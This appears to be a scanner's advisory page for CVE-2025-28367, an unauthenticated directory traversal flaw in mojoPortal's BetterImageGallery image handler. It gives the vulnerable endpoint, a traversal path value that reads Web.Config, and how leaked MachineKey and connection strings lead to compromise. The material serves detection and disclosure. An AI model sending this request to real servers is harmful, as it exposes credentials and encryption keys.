CVE-2025-28367 Scanner

mojoPortal is an open-source, cross-platform web content management system (CMS) developed using ASP.NET. It is widely used by developers and organizations to create dynamic websites and portals with features like blogs, forums, and media galleries. Typically deployed on Windows servers, it supports a variety of .NET compatible hosting environments. Developers value mojoPortal for its ease of integration, extensibility, and modular architecture. It includes APIs that allow customization and plugin development for specific use cases. Despite its discontinued official support, it remains in use by legacy systems and internal applications.

The Directory Traversal vulnerability in mojoPortal allows an attacker to access sensitive files on the server. The flaw exists in the BetterImageGallery API Controller, specifically in the ImageHandler action, where the path parameter is not securely sanitized. By manipulating this parameter, attackers can traverse directories outside the intended file path. This can lead to the exposure of configuration files such as Web.Config. The Web.Config file may contain sensitive data including encryption keys and credentials. Exploiting this vulnerability does not require authentication and can be triggered via a simple crafted request.

Technically, the vulnerability lies in a GET request to the `/api/BetterImageGallery/imagehandler` endpoint with the `path` parameter. When a path such as `../../../Web.Config` is passed, the application does not restrict it, thus allowing directory traversal. The system fails to validate or sanitize the user-supplied path, enabling direct access to files outside the image directory. A successful exploitation returns a 200 OK response containing the contents of the Web.Config file. The presence of `` and `` tags in the response confirms the exposure. This behavior suggests that input validation is either missing or improperly implemented in the API logic.

If this vulnerability is exploited, malicious actors could access the Web.Config file, exposing sensitive configuration details. This includes the MachineKey, which is critical for data encryption and validation. With access to this key, attackers could forge authentication tokens, leading to privilege escalation. Additionally, other confidential settings like database connection strings may also be disclosed. Ultimately, this exposure can facilitate a full compromise of the application. The risk is further amplified by the unauthenticated nature of the attack.

REFERENCES

• https://github.com/i7MEDIA/mojoportal
• https://www.0xlanks.me/blog/cve-2025-28367-advisory/
• https://nvd.nist.gov/vuln/detail/CVE-2025-28367